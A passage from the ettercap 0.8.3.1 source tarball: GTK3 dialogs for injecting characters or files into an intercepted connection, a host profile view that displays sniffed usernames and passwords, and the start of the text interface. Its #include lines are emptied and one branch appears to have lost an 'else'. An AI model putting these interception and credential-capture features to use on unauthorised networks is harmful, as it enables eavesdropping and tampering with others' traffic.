destination:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_box_pack_start (GTK_BOX (vbox), label, FALSE, FALSE, 0); hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 5); gtk_box_pack_start(GTK_BOX(vbox), hbox, FALSE, FALSE, 0); button1 = gtk_radio_button_new_with_label(NULL, ip_addr_ntoa(&curr_conn->L3_addr2, tmp)); gtk_box_pack_start(GTK_BOX(hbox), button1, FALSE, FALSE, 0); button2 = gtk_radio_button_new_with_label_from_widget(GTK_RADIO_BUTTON (button1), ip_addr_ntoa(&curr_conn->L3_addr1, tmp)); gtk_box_pack_start(GTK_BOX(hbox), button2, FALSE, FALSE, 0); label = gtk_label_new ("Characters to be injected:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_box_pack_start (GTK_BOX (vbox), label, FALSE, FALSE, 0); frame = gtk_frame_new(NULL); gtk_frame_set_shadow_type(GTK_FRAME (frame), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX (vbox), frame, TRUE, TRUE, 5); text = gtk_text_view_new(); gtk_text_view_set_wrap_mode(GTK_TEXT_VIEW (text), GTK_WRAP_CHAR); gtk_container_add(GTK_CONTAINER (frame), text); gtk_widget_show_all(dialog); response = gtk_dialog_run(GTK_DIALOG(dialog)); if(response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); SAFE_REALLOC(injectbuf, 501 * sizeof(char)); memset(injectbuf, 0, 501); buf = gtk_text_view_get_buffer(GTK_TEXT_VIEW (text)); /* initialize iters for get text */ gtk_text_buffer_get_start_iter(buf, &start); gtk_text_buffer_get_start_iter(buf, &end); /* advance end iter to end of text, 500 char max */ gtk_text_iter_forward_chars(&end, 500); strncpy(injectbuf, gtk_text_buffer_get_text(buf, &start, &end, FALSE), 501); if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button1))) gtkui_inject_user(1); else if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button2))) gtkui_inject_user(2); } gtk_widget_destroy(dialog); } static void gtkui_inject_user(int side) { size_t len; /* escape the sequnces in the buffer */ len = strescape(injectbuf, injectbuf, strlen(injectbuf)+1); /* check where to inject */ if (side == 1 || side == 2) { user_inject(injectbuf, len, curr_conn, side); } } /* * inject form a file */ static void gtkui_connection_inject_file(void) { /* START */ GtkWidget *dialog, *label, *vbox, *hbox, *content_area; GtkWidget *button1, *button2, *button, *entry; char tmp[MAX_ASCII_ADDR_LEN]; const char *filename = NULL; gint response = 0; DEBUG_MSG("gtk_connection_inject_file"); if(curr_conn == NULL) return; dialog = gtk_dialog_new_with_buttons("Character Injection", GTK_WINDOW (window), GTK_DIALOG_MODAL|GTK_DIALOG_USE_HEADER_BAR, "_Cancel", GTK_RESPONSE_CANCEL, "_OK", GTK_RESPONSE_OK, NULL); gtk_window_set_default_size(GTK_WINDOW (dialog), 400, 150); #if !GTK_CHECK_VERSION(2, 22, 0) gtk_dialog_set_has_separator(GTK_DIALOG (dialog), FALSE); #endif gtk_container_set_border_width(GTK_CONTAINER (dialog), 5); content_area = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); vbox = gtk_box_new(GTK_ORIENTATION_VERTICAL, 0); gtk_box_pack_start(GTK_BOX(content_area), vbox, FALSE, FALSE, 0); label = gtk_label_new ("Packet destination:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_box_pack_start (GTK_BOX (vbox), label, FALSE, FALSE, 0); hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 5); gtk_box_pack_start (GTK_BOX (vbox), hbox, FALSE, FALSE, 0); button1 = gtk_radio_button_new_with_label(NULL, ip_addr_ntoa(&curr_conn->L3_addr2, tmp)); gtk_box_pack_start(GTK_BOX(hbox), button1, FALSE, FALSE, 0); gtk_widget_show(button1); button2 = gtk_radio_button_new_with_label_from_widget(GTK_RADIO_BUTTON (button1), ip_addr_ntoa(&curr_conn->L3_addr1, tmp)); gtk_box_pack_start(GTK_BOX(hbox), button2, FALSE, FALSE, 0); label = gtk_label_new ("File to inject:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_box_pack_start (GTK_BOX (vbox), label, FALSE, FALSE, 0); hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 5); gtk_box_pack_start (GTK_BOX (vbox), hbox, FALSE, FALSE, 0); entry = gtk_entry_new(); gtk_box_pack_start(GTK_BOX (hbox), entry, TRUE, TRUE, 0); button = gtk_button_new_with_label("..."); gtk_box_pack_start(GTK_BOX (hbox), button, FALSE, FALSE, 0); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_filename_browse), entry); gtk_widget_show_all(dialog); response = gtk_dialog_run(GTK_DIALOG (dialog)); if(response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); filename = gtk_entry_get_text(GTK_ENTRY (entry)); if(filename && strlen(filename) > 0) { if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button1))) gtkui_inject_file(filename, 1); else if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button2))) gtkui_inject_file(filename, 2); } } gtk_widget_destroy(dialog); } /* * map the file into memory and pass the buffer to the inject function */ static void gtkui_inject_file(const char *filename, int side) { int fd; void *buf; size_t size, ret; DEBUG_MSG("inject_file %s", filename); /* open the file */ if ((fd = open(filename, O_RDONLY | O_BINARY)) == -1) { ui_error("Can't load the file"); return; } /* calculate the size of the file */ size = lseek(fd, 0, SEEK_END); /* load the file in memory */ SAFE_CALLOC(buf, size, sizeof(char)); /* rewind the pointer */ lseek(fd, 0, SEEK_SET); ret = read(fd, buf, size); close(fd); if (ret != size) { ui_error("Cannot read the file into memory"); return; } /* check where to inject */ if (side == 1 || side == 2) { user_inject(buf, size, curr_conn, side); } SAFE_FREE(buf); } static void set_connfilter(GtkWidget *widget, gpointer *data) { gboolean *value; DEBUG_MSG("set_connfilter"); value = (gboolean*)data; *value = gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON(widget)); /* reapply the filter */ gtk_tree_model_filter_refilter(GTK_TREE_MODEL_FILTER(filter.model)); } static void set_connfilter_host(GtkWidget *widget, gpointer *data) { /* unused variable */ (void) data; DEBUG_MSG("set_connfilter_host"); filter.host = gtk_entry_get_text(GTK_ENTRY(widget)); /* reapply the filter */ gtk_tree_model_filter_refilter(GTK_TREE_MODEL_FILTER(filter.model)); } static gboolean connfilter(GtkTreeModel *model, GtkTreeIter *iter, gpointer *data) { gchar *src_host, *dst_host; gboolean ret = TRUE; struct conn_tail *conn = NULL; /* unused variable */ (void) data; /* fetch row values */ gtk_tree_model_get(model, iter, 1, &src_host, 4, &dst_host, 11, &conn, -1); /* evaluate filter criteria */ /* host filter set - filter hosts that do not match */ if (filter.host && strlen(filter.host)) { if (src_host && !strcasestr(src_host, filter.host) && dst_host && !strcasestr(dst_host, filter.host)) { ret = FALSE; g_free(src_host); g_free(dst_host); } } if (conn && conn->co) { /* protocol filter */ switch (conn->co->L4_proto) { case NL_TYPE_UDP: if (!filter.udp) ret = FALSE; break; case NL_TYPE_TCP: if (!filter.tcp) ret = FALSE; break; default: if (!filter.other) ret = FALSE; } /* connection state filter */ switch (conn->co->status) { case CONN_IDLE: if (!filter.idle) ret = FALSE; break; case CONN_ACTIVE: if (!filter.active) ret = FALSE; break; case CONN_CLOSING: if (!filter.closing) ret = FALSE; break; case CONN_CLOSED: if (!filter.closed) ret = FALSE; break; case CONN_KILLED: if (!filter.killed) ret = FALSE; break; default: break; } } else { ret = FALSE; } return ret; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk3/ec_gtk3_view_profiles.c000664 000000 000000 00000055230 13711276346 023671 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include /* proto */ static void gtkui_profiles_detach(GtkWidget *child); static void gtkui_profiles_attach(void); static void gtkui_kill_profiles(void); static gboolean refresh_profiles(gpointer data); static void gtkui_profile_detail(void); static void gtkui_profile_detail_destroy(GtkWidget *widget, gpointer *data); static void gtkui_profiles_local(void); static void gtkui_profiles_remote(void); static void gtkui_profiles_convert(void); static void gtkui_profiles_dump(void *dummy); static void dump_profiles(void); static struct host_profile *gtkui_profile_selected(void); /* globals */ static char *logfile = NULL; static GtkWidget *profiles_window = NULL; static GtkWidget *treeview = NULL; static GtkTreeSelection *selection = NULL; static GtkListStore *ls_profiles = NULL; static guint profiles_idle; /* for removing the idle call */ static guint detail_timer = 0; /*******************************************/ /* * the auto-refreshing list of profiles */ void gtkui_show_profiles(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *scrolled, *vbox, *hbox, *button, *context_menu, *item; GtkCellRenderer *renderer; GtkTreeViewColumn *column; (void) action; (void) value; (void) data; DEBUG_MSG("gtk_show_profiles"); /* if the object already exist, set the focus to it */ if(profiles_window) { if(GTK_IS_WINDOW (profiles_window)) gtk_window_present(GTK_WINDOW (profiles_window)); else gtkui_page_present(profiles_window); return; } profiles_window = gtkui_page_new("Profiles", >kui_kill_profiles, >kui_profiles_detach); vbox = gtk_box_new(GTK_ORIENTATION_VERTICAL, 0); gtk_container_add(GTK_CONTAINER (profiles_window), vbox); gtk_widget_show(vbox); /* list */ scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(vbox), scrolled, TRUE, TRUE, 0); gtk_widget_show(scrolled); treeview = gtk_tree_view_new(); gtk_container_add(GTK_CONTAINER (scrolled), treeview); gtk_widget_show(treeview); selection = gtk_tree_view_get_selection (GTK_TREE_VIEW (treeview)); gtk_tree_selection_set_mode (selection, GTK_SELECTION_SINGLE); g_signal_connect (G_OBJECT (treeview), "row_activated", G_CALLBACK (gtkui_profile_detail), NULL); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes (" ", renderer, "text", 0, NULL); gtk_tree_view_column_set_sort_column_id (column, 0); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("IP Address", renderer, "text", 1, NULL); gtk_tree_view_column_set_sort_column_id (column, 1); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Hostname", renderer, "text", 2, NULL); gtk_tree_view_column_set_sort_column_id (column, 2); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); #ifdef HAVE_GEOIP renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Country", renderer, "text", 3, NULL); gtk_tree_view_column_set_sort_column_id (column, 3); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); #endif refresh_profiles(NULL); gtk_tree_view_set_model(GTK_TREE_VIEW (treeview), GTK_TREE_MODEL (ls_profiles)); hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 5); gtk_box_pack_start(GTK_BOX(vbox), hbox, FALSE, FALSE, 0); button = gtk_button_new_with_mnemonic("Purge _Local"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_profiles_local), NULL); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); button = gtk_button_new_with_mnemonic("Purge _Remote"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_profiles_remote), NULL); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); gtk_widget_show_all(hbox); button = gtk_button_new_with_mnemonic("_Convert to Host List"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_profiles_convert), NULL); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); button = gtk_button_new_with_mnemonic("_Dump to File"); g_signal_connect(G_OBJECT (button), "clicked", G_CALLBACK (gtkui_profiles_dump), NULL); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); gtk_widget_show_all(hbox); context_menu = gtk_menu_new(); item = gtk_menu_item_new_with_label("Profile Details"); gtk_menu_shell_append(GTK_MENU_SHELL(context_menu), item); g_signal_connect(G_OBJECT(item), "activate", G_CALLBACK(gtkui_profile_detail), NULL); gtk_widget_show(item); g_signal_connect(G_OBJECT(treeview), "button-press-event", G_CALLBACK(gtkui_context_menu), context_menu); /* refresh the stats window every 1000 ms */ /* GTK has a gtk_idle_add also but it calls too much and uses 100% cpu */ profiles_idle = g_timeout_add(1000, refresh_profiles, NULL); gtk_widget_show(profiles_window); } static void gtkui_profiles_detach(GtkWidget *child) { profiles_window = gtk_window_new(GTK_WINDOW_TOPLEVEL); gtk_window_set_title(GTK_WINDOW (profiles_window), "Collected passive profiles"); gtk_window_set_default_size(GTK_WINDOW (profiles_window), 400, 300); g_signal_connect (G_OBJECT (profiles_window), "delete_event", G_CALLBACK (gtkui_kill_profiles), NULL); /* make d shortcut turn the window back into a tab */ gtkui_page_attach_shortcut(profiles_window, gtkui_profiles_attach); gtk_container_add(GTK_CONTAINER (profiles_window), child); gtk_window_present(GTK_WINDOW (profiles_window)); } static void gtkui_profiles_attach(void) { gtkui_kill_profiles(); gtkui_show_profiles(NULL, NULL, NULL); } static void gtkui_kill_profiles(void) { DEBUG_MSG("gtk_kill_profiles"); g_source_remove(profiles_idle); gtk_widget_destroy(profiles_window); profiles_window = NULL; } static gboolean refresh_profiles(gpointer data) { GtkTreeIter iter; GtkTreeModel *model; gboolean gotiter = FALSE; struct host_profile *hcurr, *hitem; struct open_port *o; struct active_user *u; char tmp[MAX_ASCII_ADDR_LEN]; char name[MAX_HOSTNAME_LEN]; int found = 0; /* variable not used */ (void) data; if(!ls_profiles) { ls_profiles = gtk_list_store_new (5, G_TYPE_STRING, G_TYPE_STRING, G_TYPE_STRING, G_TYPE_STRING, G_TYPE_POINTER); } /* get iter for first item in list widget */ model = GTK_TREE_MODEL(ls_profiles); gotiter = gtk_tree_model_get_iter_first(model, &iter); TAILQ_FOREACH(hcurr, &EC_GBL_PROFILES, next) { /* see if the item is already in our list */ gotiter = gtk_tree_model_get_iter_first(model, &iter); while(gotiter) { gtk_tree_model_get (model, &iter, 4, &hitem, -1); if(hcurr == hitem) { found = 0; /* search at least one account */ LIST_FOREACH(o, &(hcurr->open_ports_head), next) { LIST_FOREACH(u, &(o->users_list_head), next) { found = 1; } } gtk_list_store_set (ls_profiles, &iter, 0, (found)?"X":" ", -1); /* check if we have to update the hostname */ if (strcmp(hcurr->hostname,"")) { gtk_list_store_set(ls_profiles, &iter, 2, hcurr->hostname, -1); } else { /* resolve the hostname (using the cache) */ if (host_iptoa(&hcurr->L3_addr, name) == -E_NOMATCH) { gtk_list_store_set(ls_profiles, &iter, 2, "resolving...", -1); struct resolv_object *ro; SAFE_CALLOC(ro, 1, sizeof(struct resolv_object)); ro->type = GTK_TYPE_LIST_STORE; ro->liststore = GTK_LIST_STORE(ls_profiles); ro->treeiter = iter; ro->column = 2; ro->ip = &hcurr->L3_addr; g_timeout_add(1000, gtkui_iptoa_deferred, ro); } else { strncpy(hcurr->hostname, name, MAX_HOSTNAME_LEN); gtk_list_store_set(ls_profiles, &iter, 2, hcurr->hostname, -1); } } break; } gotiter = gtk_tree_model_iter_next(model, &iter); } /* if it is, move on to next item */ if(gotiter) continue; found = 0; /* search at least one account */ LIST_FOREACH(o, &(hcurr->open_ports_head), next) { LIST_FOREACH(u, &(o->users_list_head), next) { found = 1; } } /* otherwise, add the new item */ gtk_list_store_append (ls_profiles, &iter); gtk_list_store_set (ls_profiles, &iter, 0, (found)?"X":" ", 1, ip_addr_ntoa(&hcurr->L3_addr, tmp), 4, hcurr, -1); #ifdef HAVE_GEOIP if (EC_GBL_CONF->geoip_support_enable) gtk_list_store_set(ls_profiles, &iter, 3, geoip_country_by_ip(&hcurr->L3_addr), -1); #endif /* treat hostname resolution differently due to async processing */ if (strcmp(hcurr->hostname,"")) { gtk_list_store_set(ls_profiles, &iter, 2, hcurr->hostname, -1); } else { /* resolve the hostname (using the cache) */ if (host_iptoa(&hcurr->L3_addr, name) == -E_NOMATCH) { gtk_list_store_set(ls_profiles, &iter, 2, "resolving...", -1); struct resolv_object *ro; SAFE_CALLOC(ro, 1, sizeof(struct resolv_object)); ro->type = GTK_TYPE_LIST_STORE; ro->liststore = GTK_LIST_STORE(ls_profiles); ro->treeiter = iter; ro->column = 2; ro->ip = &hcurr->L3_addr; g_timeout_add(1000, gtkui_iptoa_deferred, ro); } else { strncpy(hcurr->hostname, name, MAX_HOSTNAME_LEN); gtk_list_store_set(ls_profiles, &iter, 2, hcurr->hostname, -1); } } } return TRUE; } /* * display details for a profile */ static void gtkui_profile_detail(void) { GtkWidget *dwindow, *vbox, *hbox, *grid, *label, *header, *content; struct host_profile *h; struct open_port *o; struct active_user *u; char tmp[MAX_ASCII_ADDR_LEN]; char os[OS_LEN+1]; gchar *str, *markup; guint col = 0, row = 0; DEBUG_MSG("gtkui_profile_detail"); h = gtkui_profile_selected(); memset(os, 0, sizeof(os)); header = gtk_header_bar_new(); gtk_header_bar_set_title(GTK_HEADER_BAR(header), "Profile Details"); gtk_header_bar_set_decoration_layout(GTK_HEADER_BAR(header), ":close"); gtk_header_bar_set_show_close_button(GTK_HEADER_BAR(header), TRUE); dwindow = gtk_dialog_new(); gtk_window_set_titlebar(GTK_WINDOW(dwindow), header); gtk_window_set_modal(GTK_WINDOW(dwindow), TRUE); gtk_window_set_transient_for(GTK_WINDOW(dwindow), GTK_WINDOW(window)); gtk_window_set_position(GTK_WINDOW(dwindow), GTK_WIN_POS_CENTER_ON_PARENT); gtk_container_set_border_width(GTK_CONTAINER(dwindow), 5); g_signal_connect(G_OBJECT(dwindow), "delete-event", G_CALLBACK(gtkui_profile_detail_destroy), NULL); vbox = gtk_box_new(GTK_ORIENTATION_VERTICAL, 5); content = gtk_dialog_get_content_area(GTK_DIALOG(dwindow)); gtk_container_add(GTK_CONTAINER(content), vbox); grid = gtk_grid_new(); gtk_grid_set_row_spacing(GTK_GRID(grid), 5); gtk_grid_set_column_spacing(GTK_GRID(grid), 5); gtk_container_set_border_width(GTK_CONTAINER(grid), 8); gtk_box_pack_start(GTK_BOX(vbox), grid, FALSE, FALSE, 0); /* Host Information */ label = gtk_label_new("Host Information:"); markup = g_markup_printf_escaped("%s", gtk_label_get_text(GTK_LABEL(label))); gtk_label_set_markup(GTK_LABEL(label), markup); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 3, 1); g_free(markup); row++; label = gtk_label_new("IP address:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); label = gtk_label_new(ip_addr_ntoa(&h->L3_addr, tmp)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 2, 1); if (EC_GBL_OPTIONS->resolve) { row++; label = gtk_label_new("Hostname:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); label = gtk_label_new(h->hostname); if (!strcmp(h->hostname,"")) { /* resolve the hostname (using the cache) */ if (host_iptoa(&h->L3_addr, h->hostname) == -E_NOMATCH) { gtk_label_set_text(GTK_LABEL(label), "resolving..."); struct resolv_object *ro; SAFE_CALLOC(ro, 1, sizeof(struct resolv_object)); ro->type = GTK_TYPE_LABEL; ro->widget = GTK_WIDGET(label); ro->ip = &h->L3_addr; detail_timer = g_timeout_add(1000, gtkui_iptoa_deferred, ro); } else { gtk_label_set_text(GTK_LABEL(label), h->hostname); } } gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 2, 1); } #ifdef HAVE_GEOIP if (EC_GBL_CONF->geoip_support_enable) { row++; label = gtk_label_new("Location:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); label = gtk_label_new(geoip_country_by_ip(&h->L3_addr)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 2, 1); } #endif if (h->type & FP_HOST_LOCAL || h->type == FP_UNKNOWN) { row++; label = gtk_label_new("MAC address:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); label = gtk_label_new(mac_addr_ntoa(h->L2_addr, tmp)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 2, 1); row++; label = gtk_label_new("Manufacturer:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); label = gtk_label_new(manuf_search(h->L2_addr)); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 2, 1); } /* Connectivity information */ row++; label = gtk_label_new("Connectivity Information:"); markup = g_markup_printf_escaped("%s", gtk_label_get_text(GTK_LABEL(label))); gtk_label_set_markup(GTK_LABEL(label), markup); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_widget_set_margin_top(label, 10); gtk_grid_attach(GTK_GRID(grid), label, col, row, 3, 1); g_free(markup); row++; label = gtk_label_new("Distance:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); label = gtk_label_new((str = g_strdup_printf("%d", h->distance))); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 2, 1); g_free(str); row++; label = gtk_label_new("Type:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); if (h->type & FP_GATEWAY) label = gtk_label_new("GATEWAY"); else if (h->type & FP_HOST_LOCAL) label = gtk_label_new("LAN host"); else if (h->type & FP_ROUTER) label = gtk_label_new("REMOTE ROUTER"); else if (h->type & FP_HOST_NONLOCAL) label = gtk_label_new("REMOTE host"); else if (h->type == FP_UNKNOWN) label = gtk_label_new("unknown"); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 2, 1); /* OS and service information */ row++; label = gtk_label_new("OS and Service Information:"); markup = g_markup_printf_escaped("%s", gtk_label_get_text(GTK_LABEL(label))); gtk_label_set_markup(GTK_LABEL(label), markup); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_widget_set_margin_top(label, 10); gtk_grid_attach(GTK_GRID(grid), label, col, row, 3, 1); g_free(markup); if (h->os) { row++; label = gtk_label_new("Observed OS:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); label = gtk_label_new(h->os); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 2, 1); } row++; label = gtk_label_new("Fingerprint:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); label = gtk_label_new(h->fingerprint); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 2, 1); row++; label = gtk_label_new("Operating System:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); if (fingerprint_search(h->fingerprint, os) == E_SUCCESS) { label = gtk_label_new(os); str = g_strdup_printf("unknown fingerprint (please submit it)\nNeares one is: %s", os); label = gtk_label_new(str); g_free(str); } gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 2, 1); LIST_FOREACH(o, &(h->open_ports_head), next) { row++; label = gtk_label_new("Fingerprint:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); str = g_strdup_printf("%s %d", (o->L4_proto == NL_TYPE_TCP) ? "TCP" : "UDP", ntohs(o->L4_addr)); label = gtk_label_new(str); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 1, 1); g_free(str); str = g_strdup_printf("%s [%s]", service_search(o->L4_addr, o->L4_proto), (o->banner) ? o->banner : ""); label = gtk_label_new(str); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+2, row, 1, 1); g_free(str); LIST_FOREACH(u, &(o->users_list_head), next) { row++; if (u->failed) label = gtk_label_new("Account: *"); else label = gtk_label_new("Account:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); str = g_strdup_printf("%s / %s (%s)", u->user, u->pass, ip_addr_ntoa(&u->client, tmp)); label = gtk_label_new(str); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1, row, 2, 1); g_free(str); if (u->info) { row++; label = gtk_label_new("Info:"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col, row, 1, 1); label = gtk_label_new(u->info); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, col+1 ,row, 2, 1); } } } hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 0); gtk_box_pack_start(GTK_BOX(vbox), hbox, FALSE, FALSE, 0); gtk_widget_show_all(dwindow); } static void gtkui_profile_detail_destroy(GtkWidget *widget, gpointer *data) { (void)data; if (detail_timer) g_source_remove(detail_timer); gtk_widget_destroy(widget); } static void gtkui_profiles_local(void) { profile_purge_local(); gtk_list_store_clear(GTK_LIST_STORE (ls_profiles)); } static void gtkui_profiles_remote(void) { profile_purge_remote(); gtk_list_store_clear(GTK_LIST_STORE (ls_profiles)); } static void gtkui_profiles_convert(void) { profile_convert_to_hostlist(); gtkui_refresh_host_list(NULL); gtkui_message("The hosts list was populated with local profiles"); } static void gtkui_profiles_dump(void *dummy) { /* variable not used */ (void) dummy; DEBUG_MSG("gtkui_profiles_dump"); /* make sure to free if already set */ SAFE_FREE(logfile); SAFE_CALLOC(logfile, 50, sizeof(char)); gtkui_input("Log File :", logfile, 50, dump_profiles); } static void dump_profiles(void) { /* dump the profiles */ if (profile_dump_to_file(logfile) == E_SUCCESS) gtkui_message("Profiles dumped to file"); } static struct host_profile *gtkui_profile_selected(void) { GtkTreeIter iter; GtkTreeModel *model; struct host_profile *h = NULL; model = GTK_TREE_MODEL (ls_profiles); if (gtk_tree_selection_get_selected (GTK_TREE_SELECTION (selection), &model, &iter)) { gtk_tree_model_get (model, &iter, 4, &h, -1); } else return(NULL); /* nothing is selected */ return(h); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/text/000775 000000 000000 00000000000 13711276346 017360 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/interfaces/text/ec_text.c000664 000000 000000 00000045266 13711276346 021174 0ustar00rootroot000000 000000 /* ettercap -- text only GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include #include #include #include #ifdef OS_WINDOWS #include #else #include #endif /* globals */ struct termios old_tc; struct termios new_tc; /* proto */ void text_interface(void); static void text_init(void); static void text_cleanup(void); static void text_msg(const char *msg); static void text_error(const char *msg); static void text_fatal_error(const char *msg); static void text_input(const char *title, char *input, size_t n, void (*callback)(void)); static void text_help(void); static int text_progress(char *title, int value, int max); static void text_run_plugin(void); static void text_run_filter(void); static void text_stats(void); static void text_stop_cont(void); static void text_hosts_list(void); static void text_profile_list(void); static void text_visualization(void); static void text_redirects(void); /*******************************************/ void set_text_interface(void) { struct ui_ops ops; /* wipe the struct */ memset(&ops, 0, sizeof(ops)); /* register the functions */ ops.init = &text_init; ops.start = &text_interface; 